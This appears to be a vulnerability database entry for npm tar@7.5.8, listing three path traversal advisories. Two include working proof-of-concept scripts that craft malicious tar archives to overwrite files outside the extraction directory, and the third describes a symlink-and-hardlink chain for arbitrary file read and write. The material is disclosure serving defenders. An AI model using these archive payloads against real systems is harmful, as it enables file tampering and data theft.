Package details: pkg:npm/tar@7.5.8

- purl: pkg:npm/tar@7.5.8
- Next non-vulnerable version: 7.5.11
- Latest non-vulnerable version: 7.5.11
- Risk: 4.0

Vulnerabilities affecting this package (2)
Vulnerability: VCID-bj4b-gq5e-2kfy
Aliases: CVE-2026-29786, GHSA-qffp-2rhf-9h96
Summary:
tar has Hardlink Path Traversal via Drive-Relative Linkpath

### Summary

`tar` (npm) can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as `C:../target.txt`, which enables file overwrite outside `cwd` during normal `tar.x()` extraction.

### Details

The extraction logic in `Unpack[STRIPABSOLUTEPATH]` checks for `..` segments *before* stripping absolute roots. What happens with `linkpath: "C:../target.txt"`:

1. Split on `/` gives `['C:..', 'target.txt']`, so `parts.includes('..')` is false.
2. `stripAbsolutePath()` removes `C:` and rewrites the value to `../target.txt`.
3. Hardlink creation resolves this against extraction `cwd` and escapes one directory up.
4. Writing through the extracted hardlink overwrites the outside file.

This is reachable in standard usage (`tar.x({ cwd, file })`) when extracting attacker-controlled tar archives.

### PoC

Tested on Arch Linux with `tar@7.5.9`.

PoC script (`poc.cjs`):

```js
const fs = require('fs')
const path = require('path')
const { Header, x } = require('tar')

const cwd = process.cwd()
const target = path.resolve(cwd, '..', 'target.txt')
const tarFile = path.join(process.cwd(), 'poc.tar')

fs.writeFileSync(target, 'ORIGINAL\n')

const b = Buffer.alloc(1536)
new Header({ path: 'l', type: 'Link', linkpath: 'C:../target.txt' }).encode(b, 0)
fs.writeFileSync(tarFile, b)

x({ cwd, file: tarFile }).then(() => {
  fs.writeFileSync(path.join(cwd, 'l'), 'PWNED\n')
  process.stdout.write(fs.readFileSync(target, 'utf8'))
})
```

Run:

```bash
cd test-workspace
node poc.cjs && ls -l ../target.txt
```

Observed output:

```text
PWNED
-rw-r--r-- 2 joshuavr joshuavr 6 Mar 4 19:25 ../target.txt
```

`PWNED` confirms outside file content overwrite. Link count `2` confirms the extracted file and `../target.txt` are hardlinked.

### Impact

This is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction.

Realistic scenarios:

- CLI tools unpacking untrusted tarballs into a working directory
- build/update pipelines consuming third-party archives
- services that import user-supplied tar files
Fixed by: 7.5.10 (affected by 1 other vulnerability)
Vulnerability: VCID-qunt-xms1-a3cc
Aliases: CVE-2026-31802, GHSA-9ppj-qmqm-q256
Summary:
node-tar Symlink Path Traversal via Drive-Relative Linkpath

### Summary

`tar` (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as `C:../../../target.txt`, which enables file overwrite outside `cwd` during normal `tar.x()` extraction.

### Details

The extraction logic in `Unpack[STRIPABSOLUTEPATH]` validates `..` segments against a resolved path that still uses the original drive-relative value, and only afterwards rewrites the stored `linkpath` to the stripped value. What happens with `linkpath: "C:../../../target.txt"`:

1. `stripAbsolutePath()` removes `C:` and rewrites the value to `../../../target.txt`.
2. The escape check resolves using the original pre-stripped value, so it is treated as in-bounds and accepted.
3. Symlink creation uses the rewritten value (`../../../target.txt`) from nested path `a/b/l`.
4. Writing through the extracted symlink overwrites the outside file (`../target.txt`).

This is reachable in standard usage (`tar.x({ cwd, file })`) when extracting attacker-controlled tar archives.

### PoC

Tested on Arch Linux with `tar@7.5.10`.

PoC script (`poc.cjs`):

```js
const fs = require('fs')
const path = require('path')
const { Header, x } = require('tar')

const cwd = process.cwd()
const target = path.resolve(cwd, '..', 'target.txt')
const tarFile = path.join(cwd, 'poc.tar')

fs.writeFileSync(target, 'ORIGINAL\n')

const b = Buffer.alloc(1536)
new Header({
  path: 'a/b/l',
  type: 'SymbolicLink',
  linkpath: 'C:../../../target.txt',
}).encode(b, 0)
fs.writeFileSync(tarFile, b)

x({ cwd, file: tarFile }).then(() => {
  fs.writeFileSync(path.join(cwd, 'a/b/l'), 'PWNED\n')
  process.stdout.write(fs.readFileSync(target, 'utf8'))
})
```

Run:

```bash
node poc.cjs && readlink a/b/l && ls -l a/b/l ../target.txt
```

Observed output:

```text
PWNED
../../../target.txt
lrwxrwxrwx - joshuavr 7 Mar 18:37 a/b/l -> ../../../target.txt
.rw-r--r-- 6 joshuavr 7 Mar 18:37 ../target.txt
```

`PWNED` confirms outside file content overwrite. `readlink` and `ls -l` confirm the extracted symlink points outside the extraction directory.

### Impact

This is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction.

Realistic scenarios:

- CLI tools unpacking untrusted tarballs into a working directory
- build/update pipelines consuming third-party archives
- services that import user-supplied tar files
Fixed by: 7.5.11 (affected by 0 other vulnerabilities)
Vulnerabilities fixed by this package (1)
Vulnerability: VCID-jj22-rfbv-bkg3
Aliases: CVE-2026-26960, GHSA-83g3-92jg-28cx
Summary:

Arbitrary File Read/Write via Hardlink Target Escape Through Symlink Chain in node-tar Extraction

### Summary

`tar.extract()` in Node `tar` allows an attacker-controlled archive to create a hardlink inside the extraction directory that points to a file outside the extraction root, using default options. This enables **arbitrary file read and write** as the extracting user (no root, no chmod, no `preservePaths`). Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive.

### Details

The bypass chain uses two symlinks plus one hardlink:

1. `a/b/c/up -> ../..`
2. `a/b/escape -> c/up/../..`
3. `exfil` (hardlink) -> `a/b/escape/<target-relative-to-parent-of-extract>`

Why this works:

- Linkpath checks are string-based and do not resolve symlinks on disk for hardlink target safety.
  - See `STRIPABSOLUTEPATH` logic in:
    - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:255`
    - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:268`
    - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:281`
- Hardlink extraction resolves target as `path.resolve(cwd, entry.linkpath)` and then calls `fs.link(target, destination)`.
  - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:566`
  - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:567`
  - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:703`
- Parent directory safety checks (`mkdir` + symlink detection) are applied to the destination path of the extracted entry, not to the resolved hardlink target path.
  - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:617`
  - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:619`
  - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/mkdir.js:27`
  - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/mkdir.js:101`

As a result, `exfil` is created inside extraction root but linked to an external file. The PoC confirms shared inode and successful read+write via `exfil`.

### PoC

[hardlink.js](https://github.com/user-attachments/files/25240082/hardlink.js)

Environment used for validation:

- Node: `v25.4.0`
- tar: `7.5.7`
- OS: macOS Darwin 25.2.0
- Extract options: defaults (`tar.extract({ file, cwd })`)

Steps:

1. Prepare/locate a `tar` module. If `require('tar')` is not available locally, set `TAR_MODULE` to an absolute path to a tar package directory.
2. Run:

   ```bash
   TAR_MODULE="$(cd '../tar-audit-setuid - CVE/node_modules/tar' && pwd)" node hardlink.js
   ```

3. Expected vulnerable output (key lines):

   ```text
   same_inode=true
   read_ok=true
   write_ok=true
   result=VULNERABLE
   ```

Interpretation:

- `same_inode=true`: extracted `exfil` and external secret are the same file object.
- `read_ok=true`: reading `exfil` leaks external content.
- `write_ok=true`: writing `exfil` modifies external file.

### Impact

Vulnerability type:

- Arbitrary file read/write via archive extraction path confusion and link resolution.

Who is impacted:

- Any application/service that extracts attacker-controlled tar archives with Node `tar` defaults.
- Impact scope is the privileges of the extracting process user.

Potential outcomes:

- Read sensitive files reachable by the process user.
- Overwrite writable files outside extraction root.
- Escalate impact depending on deployment context (keys, configs, scripts, app data).

| Date | Actor | Action | Vulnerability | Source | VulnerableCode Version |
|---|---|---|---|---|---|
| 2026-04-29T23:17:56.506716+00:00 | GitLab Importer | Affected by | VCID-qunt-xms1-a3cc | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-31802.yml | 38.5.0 |
| 2026-04-29T23:15:07.788142+00:00 | GitLab Importer | Affected by | VCID-bj4b-gq5e-2kfy | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/GHSA-qffp-2rhf-9h96.yml | 38.5.0 |
| 2026-04-29T23:14:43.544554+00:00 | GitLab Importer | Affected by | VCID-bj4b-gq5e-2kfy | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-29786.yml | 38.5.0 |
| 2026-04-29T23:01:09.418497+00:00 | GitLab Importer | Fixing | VCID-jj22-rfbv-bkg3 | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-26960.yml | 38.5.0 |
| 2026-04-17T00:34:08.906329+00:00 | GitLab Importer | Affected by | VCID-qunt-xms1-a3cc | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-31802.yml | 38.4.0 |
| 2026-04-17T00:31:26.144980+00:00 | GitLab Importer | Affected by | VCID-bj4b-gq5e-2kfy | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/GHSA-qffp-2rhf-9h96.yml | 38.4.0 |
| 2026-04-17T00:31:00.949826+00:00 | GitLab Importer | Affected by | VCID-bj4b-gq5e-2kfy | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-29786.yml | 38.4.0 |
| 2026-04-17T00:18:15.460595+00:00 | GitLab Importer | Fixing | VCID-jj22-rfbv-bkg3 | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-26960.yml | 38.4.0 |
| 2026-04-12T01:59:09.531854+00:00 | GitLab Importer | Affected by | VCID-qunt-xms1-a3cc | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-31802.yml | 38.3.0 |
| 2026-04-12T01:56:06.566762+00:00 | GitLab Importer | Affected by | VCID-bj4b-gq5e-2kfy | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/GHSA-qffp-2rhf-9h96.yml | 38.3.0 |
| 2026-04-12T01:55:45.302321+00:00 | GitLab Importer | Affected by | VCID-bj4b-gq5e-2kfy | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-29786.yml | 38.3.0 |
| 2026-04-12T01:42:32.394767+00:00 | GitLab Importer | Fixing | VCID-jj22-rfbv-bkg3 | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-26960.yml | 38.3.0 |
| 2026-04-08T03:25:26.618030+00:00 | GitLab Importer | Affected by | VCID-bj4b-gq5e-2kfy | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/GHSA-qffp-2rhf-9h96.yml | 38.1.0 |
| 2026-04-08T03:24:51.302458+00:00 | GitLab Importer | Affected by | VCID-bj4b-gq5e-2kfy | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-29786.yml | 38.1.0 |
| 2026-04-03T01:51:24.210666+00:00 | GitLab Importer | Fixing | VCID-jj22-rfbv-bkg3 | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-26960.yml | 38.1.0 |
| 2026-04-01T16:08:01.098841+00:00 | GHSA Importer | Fixing | VCID-jj22-rfbv-bkg3 | https://github.com/advisories/GHSA-83g3-92jg-28cx | 38.0.0 |
| 2026-04-01T12:53:53.401329+00:00 | GitLab Importer | Fixing | VCID-jj22-rfbv-bkg3 | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/tar/CVE-2026-26960.yml | 38.0.0 |
| 2026-04-01T12:52:37.429907+00:00 | GithubOSV Importer | Fixing | VCID-jj22-rfbv-bkg3 | https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-83g3-92jg-28cx/GHSA-83g3-92jg-28cx.json | 38.0.0 |